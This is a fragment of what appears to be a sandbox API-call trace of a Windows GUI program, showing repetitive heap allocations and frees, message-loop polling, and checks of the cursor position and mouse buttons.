RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.752] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed94c0 [0273.752] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33b98 [0273.752] Sleep (dwMilliseconds=0x0) [0273.753] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed94c0 | out: hHeap=0xcc0000) returned 1 [0273.753] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33b98 | out: hHeap=0xcc0000) returned 1 [0273.753] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.753] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.753] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.754] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.754] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.754] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.754] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.754] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.754] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.754] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.754] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x38) returned 0xf40e00 [0273.754] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.754] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf40e00 | out: hHeap=0xcc0000) returned 1 [0273.754] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.754] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.754] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.754] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.754] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.754] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed94c0 [0273.754] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33b98 [0273.754] Sleep (dwMilliseconds=0x0) [0273.755] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed94c0 | out: hHeap=0xcc0000) returned 1 [0273.755] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33b98 | out: hHeap=0xcc0000) returned 1 [0273.755] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.755] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.755] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.755] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.755] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.755] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.755] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.755] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.755] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.756] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.756] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x38) returned 0xf40e00 [0273.756] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.756] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf40e00 | out: hHeap=0xcc0000) returned 1 [0273.756] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.756] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.756] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.756] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.756] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.756] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed94c0 [0273.756] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33b98 [0273.756] Sleep (dwMilliseconds=0x0) [0273.758] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed94c0 | out: hHeap=0xcc0000) returned 1 [0273.758] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33b98 | out: hHeap=0xcc0000) returned 1 [0273.758] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.758] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 1 [0273.758] TranslateAcceleratorW (hWnd=0xc0170, hAccTable=0x1b016b, lpMsg=0x8dfb04) returned 0 [0273.758] TranslateMessage (lpMsg=0x8dfb04) returned 0 [0273.758] DispatchMessageW (lpMsg=0x8dfb04) returned 0x0 [0273.758] GetForegroundWindow () returned 0xc0170 [0273.759] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0273.759] GetCursorPos (in: lpPoint=0x8df940 | out: lpPoint=0x8df940*(x=558, y=531)) returned 1 [0273.759] ScreenToClient (in: hWnd=0xc0170, lpPoint=0x8df940 | out: lpPoint=0x8df940) returned 1 [0273.759] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x24) returned 0xeebad0 [0273.759] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed94c0 [0273.759] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33ad8 [0273.759] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33b98 [0273.759] GetAsyncKeyState (vKey=1) returned 0 [0273.759] GetAsyncKeyState (vKey=2) returned 0 [0273.759] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.759] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.759] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.759] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.759] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.759] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.759] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.759] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.759] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.759] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x38) returned 0xf40e00 [0273.759] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.759] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf40e00 | out: hHeap=0xcc0000) returned 1 [0273.759] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.759] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.759] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.759] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.760] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.760] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed9220 [0273.760] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33aa8 [0273.760] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33b98 | out: hHeap=0xcc0000) returned 1 [0273.760] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed94c0 | out: hHeap=0xcc0000) returned 1 [0273.760] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.760] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xeebad0 | out: hHeap=0xcc0000) returned 1 [0273.760] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed9220 | out: hHeap=0xcc0000) returned 1 [0273.760] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33aa8 | out: hHeap=0xcc0000) returned 1 [0273.760] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.760] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.760] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.760] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.760] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.760] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.760] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.760] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.760] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.760] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.760] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x38) returned 0xf40e00 [0273.760] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.760] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf40e00 | out: hHeap=0xcc0000) returned 1 [0273.760] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.760] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.760] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.760] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.761] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.761] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed9220 [0273.761] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33aa8 [0273.761] Sleep (dwMilliseconds=0x0) [0273.762] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed9220 | out: hHeap=0xcc0000) returned 1 [0273.762] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33aa8 | out: hHeap=0xcc0000) returned 1 [0273.762] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.762] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.762] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.762] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.762] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.762] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.762] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.762] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.762] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.762] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.762] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x38) returned 0xf40e00 [0273.762] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.762] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf40e00 | out: hHeap=0xcc0000) returned 1 [0273.762] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.762] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.763] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.763] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.763] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.763] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed9220 [0273.763] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33aa8 [0273.763] Sleep (dwMilliseconds=0x0) [0273.764] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed9220 | out: hHeap=0xcc0000) returned 1 [0273.764] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33aa8 | out: hHeap=0xcc0000) returned 1 [0273.764] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.764] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.764] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.764] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.764] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.764] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.764] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.764] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.764] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.764] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.764] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x38) returned 0xf40e00 [0273.764] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.764] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf40e00 | out: hHeap=0xcc0000) returned 1 [0273.764] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.764] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.764] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.765] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.765] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.765] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed9220 [0273.765] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33aa8 [0273.765] Sleep (dwMilliseconds=0x0) [0273.766] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed9220 | out: hHeap=0xcc0000) returned 1 [0273.766] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33aa8 | out: hHeap=0xcc0000) returned 1 [0273.766] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.766] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.766] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.766] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.766] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.766] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.766] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.766] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.766] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.766] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.766] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x38) returned 0xf40e00 [0273.766] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.766] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf40e00 | out: hHeap=0xcc0000) returned 1 [0273.766] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.766] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.766] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.766] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.766] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.766] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed9220 [0273.766] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33aa8 [0273.766] Sleep (dwMilliseconds=0x0) [0273.767] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed9220 | out: hHeap=0xcc0000) returned 1 [0273.767] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33aa8 | out: hHeap=0xcc0000) returned 1 [0273.768] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.768] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.768] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.768] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.768] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.768] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.768] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.768] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.768] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.768] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.768] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x38) returned 0xf40e00 [0273.768] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.768] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf40e00 | out: hHeap=0xcc0000) returned 1 [0273.768] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.768] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.768] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.768] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.768] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.768] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed9220 [0273.768] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33aa8 [0273.768] Sleep (dwMilliseconds=0x0) [0273.769] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed9220 | out: hHeap=0xcc0000) returned 1 [0273.769] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33aa8 | out: hHeap=0xcc0000) returned 1 [0273.769] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.769] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.769] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.769] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.769] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.770] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.770] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.770] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.770] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.770] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.770] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x38) returned 0xf40e00 [0273.770] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.770] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf40e00 | out: hHeap=0xcc0000) returned 1 [0273.770] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.770] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.770] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.770] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.770] RtlAllocateHeap 